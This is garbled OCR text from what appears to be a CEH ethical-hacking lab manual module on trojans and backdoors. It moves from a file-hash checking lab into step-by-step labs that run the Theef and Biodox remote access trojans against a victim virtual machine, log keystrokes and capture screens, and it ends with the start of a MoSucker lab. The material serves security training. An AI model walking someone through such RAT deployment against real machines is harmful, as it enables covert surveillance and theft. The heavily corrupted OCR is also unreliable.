Fsum ficntend
H-b2 Tools ‫ |"־‬kMhwfe (1/ 96‫! ׳‬
I B -t3 Cakuiatehashes | ghj!h3 L 9^-‫נר^ז׳‬ LI 9*‫ז*י‬ LlhailfiO U havelVA (3) |_| Koval128 (4) I_h«v«n2ac5)
j I i d«t _JhMl160(3) Q_hBv9il60(j} □ havall 60 (5) □ hava!192(3) □ h«v«l192 (A) □ havaH92[S) Ch«r11224{3J
j I 23Tea □ hav?C24 (4) Q tav*224 (5) □ hav8B56G) Dhaval256(4) □ hav8l256 (5) Qjhash Cjsh* h 5
: H i Verify checksum (4es
•- £ Gen&ilt checksum fi
Q m d2 Cmu 5jm d5 □ panama □pjw32 □ ripemd128 C ripemd160
:••05 Options
□ rip«fnd256 C! fipemdSZQ □ rshash [I!sdbm □shaO [ !dial Cshi2224)
Hash Browse For Folder ‫־‬H
File Dt\CB4-T00IACE CheckerSfsumfrontend-1.5.5.1'‫ז‬cadrnt•jC
1‫־‬-i “•‫*“יי״‬
t• A Administrator
A Computer
t f a Local Disk (CO
«lDisk<D)
iL
I | CW«I 1
£3 A "Hide Signed iL .___ —
—
Microsoft Entries" option

helps you to zoom in on
third-party auto-starting
images that have been added
to your system
FIGURE 8.40: FsumFrontEnd Adding Folder.
39. Respective tiles o f die selected folder will be listed 111 a list box.

II Fsum From end v l .5.5.1 ‫ ז‬- ! u H |

14■_2 Ftum fk■>t«nd
a U ‫ ד‬ooi 1 □ Maihodb <1 / 96(
: m t J CakulatohMhtt
□ h*aH600> [ »wvaM60(4} [ |haval1G0(3) [ Ihâl192 (3) C hav.1152 (4) 1 |h«vaU92(5) I havaC24Q)
i
: T«! □ Krv»LL4 (4) (‫•** ־‬vrfiMlS) ‫|־־‬hav.l2S6<3) D H«v«l2S6 (4) □hav.l2S6<S) r ) |h » h ~ |» K « h
(9J V»1f, checksum 14c. f~~l tm&? ( kmM v jaid) panama 0 pJwS2 | |np*mdl28 r1pr<nd160 ■
: G«n«r«'.t c^*Jaum fi Q ry « n d 2 * L npem dlM Q n h i* [ju lb m Q1b»0 [_| ‫י*ייי‬ Q tlu2(2M |
cJJ Options rf*?(25« 1 4»?(164> l*a?(S12) f wr(W ‫ ח‬mefru2128(41 I I1nefru2 128(8) »«rffu?2%W
About
Hath:
File Dt\CB4-Too(>'CEH. 3 Module 06 T1cyans and BackdooisSFiles and Folder Integrity Checke\fsorrtfrontend•1.S.S.1Vftadme xa .
■_y j a :3 Fi ‫*■׳‬ f i LJ Encoding: Base 16 (hexadecimal) v] (~HMAC
Fie
^ D:\CrM-IochvThun1tM-db
(P0\C Bt-T M lA CB t4 Lab Prere—
0■ D‫־‬.'.CB+T0c!s\CEH/8 Lab Prere-
® D :\aH -T 0cl5\CEH-e lab Prerc-
0 ‫ ז‬oc(s\CEH/S Lab Prere_

£3 t>\CFH-TocisxCEH/S lab Prere_
j i j D:\CH4-Tocte\C£!-(•<€ Lab Prere_
S t D\CEH‫־‬Tocb\Cil‫־‬fv6 Lab Prere_
4J0.\CEH-Toob‫׳‬vCB+^ Lab Prere_
^D'.CTH-TochSCEH<€ lab Prert—
<| 111 | > ‫ ן‬- j[>\C£H-TochvClHv6 lab Prere_
Log -
Wrr \1le Mlpy/ltumfe 1c.‫׳‬.rfc«1jr
FIGURE 8.41: FsumFiontEnd files list.
40. Click Generate checksum files. The progress bar shows the progress
percentage complete for the hash tiles generated.
Fsum Frortend v1.5.5.1
Fium Fiontend
a LZ Tools ‫ ה‬Mrihodk (1 96 ‫)׳‬
: H 1 Cakuiatehashes
]h*al160G) [ te,*160:4} □ havall 60 (5) H]haval192 )5( □ hav*1192 (4) C]haval192 [5) □ K* 41224 31
I j 23‫־‬ Ted II (‫| ־‬K^^t224«4» [‫ ־־‬havtim (5) □ h‫״‬v.l2S6(3) )H haval2S6 )4( □ hav«l2S6 (S) 0 *‫י*»י‬
I fep Verify checksum 14es - 11» U r ‫«״‬ 3 •ndS r !-‫״‬-‫*״‬. □pjw*2 I |npemd128 ^ nprmdlfcO
: £ Generate checksum f! _]np«m«£i6 I npemdl2£] Qrehsdi ! ‫ * ־‬dbm Q*h»0 U*•“1 [!***2C224J
Options 14a? (256) I *»2GS4) ‫ * ח‬02 )512( r lsoc6» 5ncfru2128f41 I Isnefru2 128 (8) ?nrfru2 256fi
About
Hash |
File D:\CEH-Tools'C EH.3 f.lcdu e 06Trcjans ard Backdcois'sRIes and Folder Integrity CheckeAfsumfrontend-'.5.5.lMtadme‫־‬£
Q Autoruns will Fie

> 13 F | | E£j y Encoding: Base 16 (hexadecimal) ~v] □HMAC
display a dialog th\CB‫־‬MocHvThum*>vdb

(SPD.CtM-Tooh\CtH^ Lab Prere-
0■ D‫‘־‬.CEHT0cls\CEH/S Lab Prert_
with a button that O D:\CtH-TooH\CtHve Lab Prgrg-
enables you to re• B 0 ‫־‬.aH -IooH \CIH 4 Lab Pr«‫׳‬f_

^ 0:\CfH.Too»5SCfHv« lab Prert_
launch Autoruns D\CIH IeeWvC(M/fl lab Prcrc‫״‬

E 0 .\C lH -Ieo<i\CIH4 Lab P‫׳‬v«~
#)DACB4 Toob\C&+‫ «״‬Lab Prtrt-
with ^ D '.CfH Tooh\CfH*« lab Prcrr-
|4J D\CtM- 10eh\CIHw6 lab Pr*r»...
administrative
rights
FIGURE 8.42: FsumFiontEnd Generate checksum files.

1
X
‫ם‬
1
Fsum Frontend * 27%
J
Ir Ku‫׳‬n fantcnd
a •1 . Too•* ‫ ־‬iMalhodbtWKt
W C«kul4l*hMh«1
ltw H 6O 0) I twval1«>(4) lhavaH60(5) [ h*‫׳‬aM92(J) □ h«v«H92 (4) |h«val1M fS) h*r«B24 31
1 N ■ ‫״‬ 4)224) • ^ ‫) ר‬ r *WV4224 IS) 1‫ ־‬h«v#l2St><J> r |4) □ h.v.l2S6(S) ‫״‬J il h « h
n !h « h
; (9.J Vwif, Lhw.Uun.t4c, ~ }m d / r [ imiwmim —|nprmdl28 liprm dlM
‫׳‬-•j j 6«nwj : «th*ckium 1i □ S* [ _ 1*pemdl« _J«h‫ ״‬h □ ihnO |«h*1
I ;••cli Option* shM? 064) l*w?(S1?) r W fis Wffru212«(41 Iinf#ru2 1?8 (8) W#ru22 K M
I :. . j 3 About
File C vLa .V . &‫׳‬. y.. ,.CtsktopvTtst.UX
Encoding: Ba.e 16 <hewdicim.il) v □ hmac |
O You can also use the -e File ‫׳‬nd5

D:\CEM-1oc :1 vThuubvdb B16B0289...
command-line option to I^D.CfcH-ToctsvCEH/* Lab PrtfS- C482F590‫״‬
launch initially launch ■ D:\CB+Toc!s\CB+<e Lab Prere-
SH ttO H -T 0c»5\CEH*labPrerc_
4C029WF-
J40E83IC‫״‬
Autoruns with
5 3 D'.CfcH-1octs\C£H/S Lib Preffc_ 007C8321-
administrative rights 3 DACEH-Toc*s\C&+/* Lab Prcre_ D22FF2CC...
j i , D:\CB4-Tock\C£R.« Lab Prrrr_ 3B85A96A...
D:\CEH-Toc(s\C£Hv6 L«b Prere— C783050E7A7741C269A3S127BA6FMA7 |
£)DA<B4-T oo&C B*« Lab Prere- E8ECEDSA...
< Î>\CFH-Toc^CFH-eHbPrerc_ 08*2202-
j - , Log -
Re C:'U»*S\Admin««rjw<\0«ktop\Testt«t
mdS: D41DeCDS»0CKGa13®09OGICFW2r£
1 Extcuton: (XkOCfcOOCOI
Rc ft'CEH-Too•?‘Thunb^. db
II <1
1p, ‫׳‬llurri'f lOU'tffcXgF
FIGURE 8.43: FsumFrontEnd progress of hash files.
41. The following is die list o f 111d5 tiles after completion.
& CEH-Tools are

also located
mapped Network
Drive (Z:) of Virtual
Machines
FIGURE 8.44: FsumFrontEnd list of hash files.
Lab Analysis
Analyze and document the results related to die lab exercise. Give vour opinion on
your target’s security posture and exposure dirough public and free information.


Questions
1. Scenario: Alice wants to use TCP View to keep an eye 011 external
connections. However, sometimes there are large numbers o f connections
with a Remote Address o f "localliost:####". These entnes do not tell
Alice anything o f interest, and the large quantity of entnes caused useful
entries to be pushed out of view.
2. Is there any way to filter out the "localliost:####" Remote Address

entries?
3. Evaluate what are the other details displayed by “autoruns” and analyze the
working of autonuis tool.
4. Evaluate the other options o f Jv l6 Power Tool and analyze the result.
5. Evaluate and list die algonduns diat FsumFrontEnd supports.

□ Yes 0 No
C E H L ab M an u al P age 489 E tliical H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

Creating a Server Using the Theef

Tbeef is a Windon•s-based applicationfor both the client and server end. The Theef
server is a vims that yon install onyonr victim's computer, and the Thef client in
nhatyou then use to control the vims.

/' Valuable A backdoor Trojan provides remote, usually surreptitious, access to affected
information
systems. A backdoor Trojan may be used to conduct distributed denial-of-
S Test your service (DDoS) attacks, 01‫ ־‬it may be used to install additional Trojans or other
k n o w led g e_______ forms o f malicious software. For example, a backdoor Trojan may be used to
* Web exercise install a downloader 01‫ ־‬dropper Trojan, which may 111 turn install a proxy
Trojan used to relay spam or a keylogger Trojan, which monitors and sends
£Q! Workbook review keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the
affected system and thus potentially lead to further compromise by other
attackers.
stealing valuable data from the network, and identity theft.
Lab Objectives
attacks.
JT Tools The objectives o f the lab niclude:
demonstrated in
this lab are ■ Creating a server and testing the network for attack
available in
■ Detecting Trojans and backdoors
D:\CEH-
Tools\CEHv8 ■ Attacking a network usmg sample Trojans and documenting all
Module 06 Trojans vulnerabilities and flaws detected
and Backdoors
Lab Environment
To carry tins out, you need:
■ T heef tool located at D:\CEH-T00 ls\CEHv8 Module 06 Trojans and
Backdoors\Trojans Types\Rem ote A c c e s s Trojans (RAT)\Theef

■ A computer running Windows Server 2012 as host machine

■ A computer running Window Server 8 Virtual Machine (Attacker)
■ Windows Server 2008 mnning 111 Virtual Machine (Victim)
■ A web browser with Internet access

Lab Duration
Time: 20 Minutes

damage, such as mining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may
differ from what it is 111 die lab, but die actual process of creating the server and die
client is same as shown 111 diis lab.
Lab Tasks
M TASK 1 1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEH-
Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote
Create Server
A ccess Trojans (RAT)\Theef.
with Pro Rat
2. Double-click Server2 10 .exe to run die Trojan on the victim’s machine.
jija
* T‫׳‬ojans T /oes » denote Ac:e5s ‫ ־‬roiars (RAT) » Theef
L °‫*ז‬°
I » I Date modi-ied I - I Type M Sire H
I 0 . COOararr.n
‫י‬ Ctontt10.**•
Edacrvcr 210 e>e
I pass s
j readn-e.txt
ciders v P|B9B9EBB
1 !■3upx.exe
Cemnond Shell ~rw * I ^
JA Defacenent 'ro ja rs
^ D estruave T'coans
| . Ebanang Trojans
Ji E-Mal T‫׳‬ojans
F P T ro ja r
£ GUI Trojans
0
i-rrTFH‫־‬TPS‫ ־‬r )ars
i t ICMP Bcddoor
^ MAC OS X Trojans
^ Proxy Ser\er Trojan:
Remote Access “rtge
Apocalypse
^ Atelie‫ ׳‬web Rem 31
k). DarkCorretRAT __
^ ProRst
Theef
FIGURE 8.1: Windows Server 2008-Theef Folder
3. 111 the Open File - Security Warning window, click Run, as shown in die
following screenshot.

Open File - Security Warning
The publisher could not be verified Are you sure you want to
run this software?
Name ...emote Access Trojans (RAT)\Theef\Server210.exe
I] Publisher Unknown Publisher
Type Application
From Z:\CEHv8 Module 06Trojans and Backdoors\Trojan...
Run Cancel
This file does not have a valid digital signature that verifies its
't publisher. You should only run software from publishers you trust.
How can I decide what software to run ‫ל‬
FIGURE 8.2: Windows Server 2008-Secuiity Warning
4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06

Trojans and Backdoors\Trojans Types\Remote A ccess Trojans
(RAT)\Theef.
5. Double-click Client210.exe to access the victim macliine remotely.
|P. qTT” 1 A p p lic a to r took Theef
| Home Share View Manage v©

‫&־ «־־‬
• ‫ ״‬Trcjans Types ► Remote Access Trojans (RAT) ►Theef v | (j | | Search Theef fi |
Favorites £ c c ip a ra - n .n i
■ D esktop | Cl c rt2 '0 .e x e j

£ D ow nloads iflj Ec'1tser\er21 C.exe
^ R e ce n t places pcss.dll
| rea d m e, tx:
3 9 Libraries "‫ «׳‬Scanner.dll
[ 1 D o cu m en ts ■ Sever2IO .ex6
J ' ‫ ׳‬M usic ■ J upx.exe
m P ictu re s <6 zip.dl

|j Videos
H o m e g ro u p
f f 1 C o m p u ter
tim Local Disk (C:)

V CEH Tools ( \\1 0.0.0.
N etw ork
9 items 1 item selected S22 KB
FIGURE 8.3: Windows 8-Running Client210.exe
6. 111 the Open File - Security Warning window, click Run. as shown 111 die

T h e p u b lis h e r c o u ld n o t b e v e r if ie d . A r e y o u s u re y o u w a n t t o r u n th is
s o ftw a re ?
Nam e: ...p e s \R e m o te A ccess T ro ja n s (R A T )\T h e e f\C lie n t2 1 0 .e x e

S3 P u b lis h e r U n k n o w n P u b lis h e r
Type A p p lic a tio n
F ro m : Z : \ C E H v 8 M o d u le 0 6 T r o ja n s a n d B ackd o orsN T ro ja ns T...
Run C a nce l
T h is f ile d oe s n o t h a ve a v a lid d ig ita l s ig n a tu re th a t v e rifie s its

p u b lis h e r. Y o u s h o u ld o n ly ru n s o ftw a re f r o m p u b lis h e rs y o u tru s t.
H o w ca n I d e c id e w h a t s o ftw a re t o run?
FIGURE 8.4: Windows 8-Security Warning
7. The maui window o f Theef appears, as shown 111 die following screenshot.
‫ ׳‬n e e tv ^ iu 1^ 0‫־‬
Connect
■>‫׳‬ Port 6 703 FTP 2 968
Connect Disconnect
A ☆
Th eef version 2.10 01/No‫׳‬.‫׳‬ember/2004
FIGURE 8.5: Theef Main Screen
8. Enter an IP address 111 the IP held, and leave die Port and FTP tields as dieir
defaults.
9. 111 diis lab we are attacking W indows Server 2008 (10.0.0.13). Click
C onnect after entering die IP address o f Windows Server 2008.

T T 7Tieef v 2 10
Connect
Port 6 703 FTP 2 968
Connect Disconnect
A
C omputer inform ation
FIGURE 8.6: Theef Connecting to Victim Machine
10. Now ill W indows 8 you have access to view the W indows Server 2008
machine remotely.
ro -h e e fv .2 .1 0
Connect
10.0.0.13 - Port 6 703 FTP 2 968
Connect Disconnect
[15:05:31] Attempting connection with 10.0.0.13

[15:05:31] Connection established with 10.0.0.13
[15:05:31] Connection accepted
[15:05:31] Connected to tran sfer port
A % •Qj SY &
Connected to server
FIGURE 8.7: Theef Gained access of Victim Machine
11. To view die computer information, click die Computer icon at die bottom
of die window.
12. 111 Computer Information, you are able to view PC Details. OS Info, Home,
and Network by clicking on die respective buttons.

C om puter Inform ation
Reply PCDetails re ceive d
FIGURE 8.8: Theef Compute! Information
13. Click die Spy icon to capture screens, keyloggers, etc. o f die victim’s
machine.
p r TTieef v.2.10
C om puter Inform ation
User name: Administrator

Computer name: WIN-EGBHISG14L0
Registered organisation: Microsoft
Registered owner: Microsoft
Workgroup: [Unknown]
Available memory: 565 Mb of 1022 Mb
Processor: Genuinelntel Inte64 Family 6 Model 42 Stepping 7 (3 09 5 M hz)
Display res: 800 x 600
Printer: [Unknown]
Hard drives:
C:\ (6,186 Mb of 16,381 Mb free)
PC Details <#] OS Info ^ 5 Home Network
FIGURE 8.9: Theef Spy
14. Select K eylogger to record die keystrokes ol die victim.

15. 111 the K eylogger window, click die Play button to record the keystrokes.

Keylogger [Started]
cv
‫*־‬j
FIGURE 8.9: Theef Keyloggei Window
16. Now go to W indows Server 2008 and type some text 111 Notepad to record
die keystrokes.
Keylogger [Started]
[New Text Document.txt - Notepad]

HiBob{BACKSRACE}{BACKSPACE}{BACKSPACE}
Billy U have been hacked by the world famouse
{BACKSPACE} hacker.j[CTRL}{CTRL}{ALT}
*51
tv <? ©
FIGURE 8.10: Theef recorded Key Strokes
17. Similarly, you can access die details of die victim’s machine by clicking die
respective icons.
Lab Analysis
your target’s security posture and exposure dirough public and free information.

PLEASE TALK TO YOUR IN STRU CTO R IF YOU HAVE QUESTIONS

R E L A T E D T O T H IS LAB.
T o o l/U t ilit y In fo rm a tio n C o lle c te d /O b je c tiv e s A c h ie v e d
O u tp u t:
T heef Victims machine PC Information
Victims machine keystorkes
Questions
1. Is there any way to falter out the "localhost:# # # # " remote address entries?
2. Evaluate the other details displayed by “autoruns” and analyze the working
of the autonins tool.
In tern et C o n n e c tio n R eq u ired
□ Yes 0 No

Creating a Server Using the Biodox

Theef is a Windons based applicationfor both the client and server end. The Theef
server is a vims that yon install on your victims coup!iter, and the Theef client in
nhat yon then use to control the virus.

/' Valuable You are a security administrator o f your company, and your job responsibilities
inform ation
T est your theft o f valuable data from the network, and identity theft.
knowledge
— W eb exercise Lab Objectives

ca W orkbook review The objective o f tins lab is to help students learn to detect Trojan and backdoor
attacks.
The objectives o f the lab include:
‫י‬ Creating a server and testing the network tor attack
‫י‬ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all
& Tools Lab Environment

dem onstrated in
th is lab are To earn‫ ״‬tins out, you need:
available in ■ B iodox tool located at D:\CEH-Tools\CEHv 8 M odule 06 Trojans and
D:\CEH- B ackdoors\T rojans Types\GUI T rojans\B iodox Trojan
Tools\CEHv 8
Module 06 Trojans ■ A computer running Windows Server 2012 as Host Machine
and B ackdoors
‫י‬ A computer running Window Server 8 Virtual Machine (Attacker)
‫י‬ W indows Server 2008 running 111 Virtual Machine (Victim)

‫י‬ Administrative privileges to nm tools
C E H L ab M an u al P age 498 E tliical H a c k in g an d C o u n term easu res Copyright © by EC-Council

Lab Duration
Tune: 20 Minutes

A Trojan is a program that contains m a licio u s or harmful code inside apparently
harmless programming or data 111 such a way that it can g e t control and cause
damage, such as mining die file allocation table on a hard dnve.
Note: The versions of die created client or host and appearance of die website may
differ from what it is 111 die lab, but die actual process of creating die server and die
Lab Tasks
m TASK 1 1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06
Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
Create Server
with Pro Rat 2. Double-click BIODOX OE Edition .e x e to m n die Trojan on die victim’s
machine.
r w ‫־‬ ' A p p lic a to r took B io d o x
I 1 Home Shaic Vievr M anage v ©
0 -* ) t « ‫ ז‬, ‫ ־‬, , n sT y p c s ► G U IT rojans ► B o cox T iojen ► Biodox v | C, | | Search Biodox

* .
Favorites Jl. L an g u a g e
W D esktop Pbgns
£ . D ow nloads ; 3 BI3COX CE Edition.e<e]
R e ce n t places ' Lee m e
& MSCOMCTL.OCX
3 9 Libraries j * MSW1NSOCOCX
H ) D o cu m en t? A r e s .q f
M usic g sew ings.ini
B P ictu re s
|§ j Videos
FIGURE 9.1: Windows 8-Biodox Contents
3. 111 the Open File - Security Warning window, click Run. as shown in
T h e p u b lish e r c ou ld n o t b e v e rifie d . A r e yo u sure you w a n t to run this

so ftw a re ?
Name: ...I T ro jan s\B iodoxTrojan\B iodox\B IO D O X OE Edition.exe
P u b lish e r U n k n o w n P u b lish e r
Type: A p p licatio n
From: Z:\CEH v8 M o d u le 06 Trojans and Backdoors\Trojans T...
Run Cancel
This file does n ot have a v alid d igital signature that verifies its
publisher. You should o n ly run software fro m publishers yo u trust.
H o w can I d ecide w hat software to run?

4. Select yourpreferred language from die drop-down list in die Biodox main
window: 111 diis lab we have selected English.
Biodox Open Source Edition
£ 3 commun
A passw or
m anage
keyboar
msn se tt
Og settings________
0 system information
(51 ; f in m anager
y commands
f1 c aptu re
server properties
local tools
|w c o n tac t us
C o rrec tio n Poet

f f Cermet tkn 6061 ua>
g T ransfer 6662
B s< r# * n 6663
5 W ebCam 6664
User Name Computer... Admin
S t a t u s : R e a d y ... C o d e d By W h o ! | w h o @ t ik k y s o ft .c o m
-------- ---
FIGURE 9.3: Windows 8-Biodox main window language selection
5. Now click die Server Editor button to build a server as shown 111 die
□ . -----------
- Fake Error Message ‫־‬
3 commenfcaton
£ ‫ ־־־‬passwords
manage fifes
□00 ; Msg Title Error* | Test M essage |
‫ נ‬keyboard |biodox w a s here

I P /[ * S -
5P msn settjnos
Adress: Message Icon :
$ settings manage'
O systenr r 1fo‫־‬m a o x 1 © ‫צג‬
‫ יוד‬f in m w aoff r Victim Na
gp> commands N am e:
Connection; |6 6 6 1 | Screen Capture; |6663 |
\J^ capture
5j strver nropprtiet T r a n sfe r:|666? | webcam C apture: |6664 |
Connection Delay ‫־‬
[‫ ־‬connection
local tools
M contact us QUvf^l c#<‫־‬. for conrwtioi
O Windowo O Temp 0 Sy8tem32

-Regetry Settings‫״‬
Server Mode‫־‬
K *y: mssrs:
(•> Gizli Mod O Yardyrr Moou s
C orrection Pxt
*3 Connection 6561
S T ransfer 6562
? ? Screen 6563
5 WebCam 6564
Admin | Opera tin... | Cpu | Ram Coentry
Status : Read/... active / deactive status
6. 111 Server Editor options, enter a victim’s IP address in die IP/DNS field; in
diis lab we are using W indows Server 2008 (10.0.0.13).

7. Leave die rest o f die settings at dieir defanltd; to build a server click die
Create Server button.
Note: IP addresses may ditter 111 your classroom labs.

Server Editor
| H 7
!13 com m uucaton

----------
£ passw ords
m anage files
□ 0 0 Msg Title : |ErfQH I
keyboard Message : |biodox w a s he re

-IP /D fs S -------
msn settings
A d re ss: 110.0.0 13| Message Icon :
settings m aT age‫־‬
^ systen- 1n fo ‫־‬m aton © ‫צג‬
■» f i r m anager
commands N am e: |v‫־‬ictim
C onn ection: [6661 | Screen C a p tu r e : [6663 |
capture
2 j se rv e r properties T r a n s f e r :|6662 | webcam C apture: [6664 |
1- Connection Delay —
■‫*׳‬f k>:al tools
'‫ )ץס‬contact us Dday|i0n **C
O Windows O Temp 0 5ystem 32
-R egistry S e ttin g s‫־‬
■Server Mode -
K ey : m ssrs3 2
© Gizli Mod O Yardyn‫ ־‬MoCu 0
V akje : m ssrs3 2 .e x e
C orrection Port
? 5 Connection
® T ransfer
6561
6562
J_U£J
? ? Screen 6563
S WebCam 6564
Vetim Marne IP Adress UserNarre Computer... Admin Operatin... Cpu Ram C ouitry
Status : Ready... create server
FIGURE 9.5: Bodox Main Screen
S erver.exe tile will be created 111 its default directory: Z:\CEHv8 Module 06
Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
‫׳‬ A pp licator Toots B io d o x
| | Home Share View M anage "S’ ©
5 0 - ♦g « Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox v|C | | Scorch Biodox
-Z Favorites J 4 Language
E Desktop M P lj 9 ‫ ״‬t
4 D ow nloads BIOCOX Cb fcd!t10n.e<e
‘k\l Recent places j p U in w

MSCOMCTL.OCX
Libraries gM S\A 1N SC K .0C X
0 D ocu m ents £ 1 e s .g f
J'' M usic p i / [ server.exe")
B Pictures f t 5ertingj.ini
0 Videos
-
FIGURE 9.5: Bodox services
9. Now switch to Windows Server 2008 Virtual Machine, and navigate to

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI
Trojans\Biodox Trojan to mil die serv er.ex e tile.

’ r0)or» "ypea - GUI Trojon* - 3‫׳‬odo<c Tro,0‫־‬n - Biodox ■

‫׳‬ ‫ ־־‬i t t J i F - &
Pile edit /1eA‫׳‬ ‫־‬ools ie p
Crg»m:e ~ » (__ Open a
Fa/orite Links
I *I tnodfi«d I *I Typ* Ms.. I•I
f D ocuncnts I i^Ptugns
%1 Pictu-es 4 I b 1X O ^ Or & 4to r .ete
R j Music p Leetre
<£ m 5c <*‫׳‬c t . . ocx
More »
MSWINSCK. C O
i^serangs.r
i. ... .*jm-r.
^ 3iodo!c Trojan
J . Botox
JA Language
J4 Pogne
FIGURE 9.6: Bodox server.exe
10. Double-click server.exe 111 Windows Server 2008 virtual macliine, and click
Run 111 die Open File - Security Warning dialog box.
‫ ן‬Open File - Security Warning
The publisher could not be verified. Are you sure you want to
run this software?
Name: .. .pes\GUI Trojans'Biodox Tr0jatVf310d0x\server.exe
E Publisher: U n know n P ub lisher
Type: Application
From: Z:\CEHv8 Module 06T roja n s and Backdoors \Trojan...
Run Cancel
• This file does not have a valid digital signature that verifies its
tgV publisher. You should only run software from publishers you trust.
How can I decide what software to run*
FIGURE 9.7: Run the tool
11. Now switch to Windows 8 Virtual Macliine and click die active/d eactive
sta tu s button to see die connected machines.


S e r v e r Editor
-F a k e Error Message —
r S commcnicaton
□ ‫■־‬------------
passw ords
m anage ftes
□Q S Msg TlUc ; |br-or
‫כ‬
j keyboard M e ssa g e : [biodox w
f la m snsettjnos
A d re ss: 10.0.013 Message Icon :
settings ma-iage‫־׳‬
O system n f o ‫־‬matr>n
‫׳‬.‫־‬#.• fin m a n a o e r - Vctim flam e‫־‬
jj‫ ׳‬commands N am e: Ivic
C on n e ctio n : [6661 | S a e e n C a p tjre : |6663 |
[_jj capture
3 se rv e r properties T r a n s f e r :|6 6 s? | webcam C apture: |6664 |
r connection
c onnection D elay -
A local tools
“\) contact us
DâyjiOI 1ee. ‫ זכי‬connectioi
O Windows O Temp 0 System 32

-R e g etry S ew ings-
•se rv e r M o d e -
K ey: m ssrs:
© Gizli Mod O Yardyrr Mocu
Connection P xt
S Connection 6561
T ransfer 6962
® Saeen 6563
® WebCam 6564
Vctom Name IP Adress User Narre Con>putcr... Admin Operatin... Cpu Ram Coentry
S t a t u s : S e t t i n g s s a v e d an d s e r v e r c r e a te d ( a c t iv e / d e a c t iv e s t a tu s
FIGURE 9.8: Bodox open source editior
12. After getting connected you can view connected victims as shown 111 die
(D0I ----------
3 commcnicaton
2 ‫ ־'־‬passw ords
m anage fles
keyboard
‫ם‬00 Msg T itle :
Message :
[Errofl
|biodox w a s here
|
msn settinos
A d re ss: 10.0.013 Message Icon ;
settings maTage‫־׳‬
O systerr n fty m a to n
----- © ‫צב‬ V
‫*׳‬fl'• f in m anager
commands
C onnection: |6661 | S a e e n C a p tu r e : |6663 |
| j | capture
ijj se rv e r prop»rt 1 »c T r a n s f e r :[6662 | webcam C apture: |6€€4 |
r Connection Delay —
‫ ־־‬local tools
o«l»y | 1 0 | fer ‫־‬ - Install P a th ------------------------
^}) contact us
O Windowo O Temp
r Server M o d e -
K ey: m ssrs3 2
O Yordyro Modu
: mssrs32e:
:onrertcn
S Connection 6561 I J/D
H Transfer 6562
‫ לי‬Saeen 6563
S WebCam 6564
altemfc . IP Adress______U ssi Marcs___ CaniButfir...__ Admin_____ Qpsratin...__ c p u

Adrrinistr... WIN -EGB.. Win Vista 3D93 0 .9 9 GB U nited.
S t a t u s : d i e n t A c t iv e
FIGURE 9.9: Bodox open source editior
13. Now you can perform actions with die victim by selecting die appropriate
action tab in die left pane of die Biodox window.
14. Now click the settin g s m anager opdon to view the applications running
and odier application settings.

@ 01 Name PID Path Memory ... Priority a

rS commuiicaton S I (system pr... 0 System 0 0
A passw ords H*J c y tttm 4 System 0
m snags fles
j keyboard
2 3 s m s s .e x e
H 3 csrss.ex e
432
500
System
System
929792
5701632
Normal
Normal
H
f la m snse ttm as 544
csrss.ex e System 7430144 Not rial
9 se ttings m aT agy
1 a p jlic a to n s ~ |
H•!! wmm1 t.e> e 552 System 4849664 Hiob B
L.-J ‫׳‬.vinlogon ex e 580 System 6287360 High
1A a p ^ ic a to n setbnos
£ ex3lore‫ ׳‬s e tin g s
1 1 ‫ )ן‬se rv c e s .e x e 628 System 7188480 Normal 0
I Q k a s s .e x e 640 System 10821632 Normal ‫ן‬-------- 1
C3 pm t
^ services 5 lls m .e x e 648 System 4812800 Normal
0 system information i y svch o st.e x e 836 System 6418432 Normal
‫׳‬. $• fun m anager 1 3 sv c fo st.e x e 896 System 7192576 Normal
jj1‫ ׳‬commands svch o st.e x e 992 System 9965568 Normal □
^ capture iij) svch o st.e x e 1015 System 7016448 Normal
j se rv e r prop ero e;
A !oral tools
svch o st.e x e
iiJ d s v c .e x e
244
296
System
System
33181695
12562432
Normal
Normal
1*1
W) con tact us svch o st.e x e 360 System 12091392 Normal v !‫וזו‬
Connection P xt
5 Connection 6561
T ransfer 6962
® Screen 6563
® WebCam 6564
? A dress User Narre C om puter... Admin O peratin... Cpu

Admmstr... WIN-EGB... True 0 .9 9 GB U nited...
Status : successfully Clear Application List
FIGURE 9.9: Boclox open source editor
15. You can also record die screenshots o f die victim by clicking die Screen
Capture button.
16. Click die Start S creen Capture button to capture screenshots o f die
victim’s machine.
FIGURE 9.10: screen capmre
17. Biodox displays the captured screenshot of the victim’s machine.

V 41 * * ** V Saeen Capture x
‫ס‬
Rctydean
‫ט‬ 9
'V.H51
SL
B
Nr* Te*t
Doarvw.txr
FIGURE 9.11: screen capture
18. Similarly, you can access die details o f die victim’s machine by clicking die
respective functions.
Lab Analysis
your target’s security posmre and exposure dirough public and tree information.
PLEASE TALK TO YOUR INSTRU CTO R IF YOU HAVE QUESTIONS

R E L A T E D T O T H IS LAB.

B iodox O u tp u t:
Record the screenshots o f the victim machine
In te rn e t C o n n ectio n R eq u ired
□ Yes 0 No

AH Rights Reserved. Reproduction is Stricdy Prohibited.
Creating a Server Using the

MoSucker
M oSucker is a V isual Basic Trojan. M0Snke/Js edit server program has a client
)rith the same layout as suhSeven's client.
I CON KEY Lab Scenario

[£Z7 Valuable A backdoor is a secret or unauthorized channel for accessing computer system.
inform ation______
111 an attack scenario, hackers install backdoors 011 a machine, once
.y v T est vour compromised, to access it 111 an easier manner at later times. W ith the growing
knowledge_______ use o f e-commerce, web applications have become the target o f choice for
** W eb exercise attackers. With a backdoor, an attacker can virtually have full and undetected
access to your application for a long time. It is critical to understand the ways
<‫־‬r • . W orkbook review
backdoors can be installed and to take required preventive steps.
theft ot valuable data Jtrom the network, and identity theft.
Lab Objectives
The objective o f this lab is to help students learn to detect Trojan and backdoor
attacks.
Tlie objectives o f the lab include:
I T Tools
dem onstrated in
■ Creating a server and testing the network for attack
th is lab are ■ Detecting Trojans and backdoors
available in
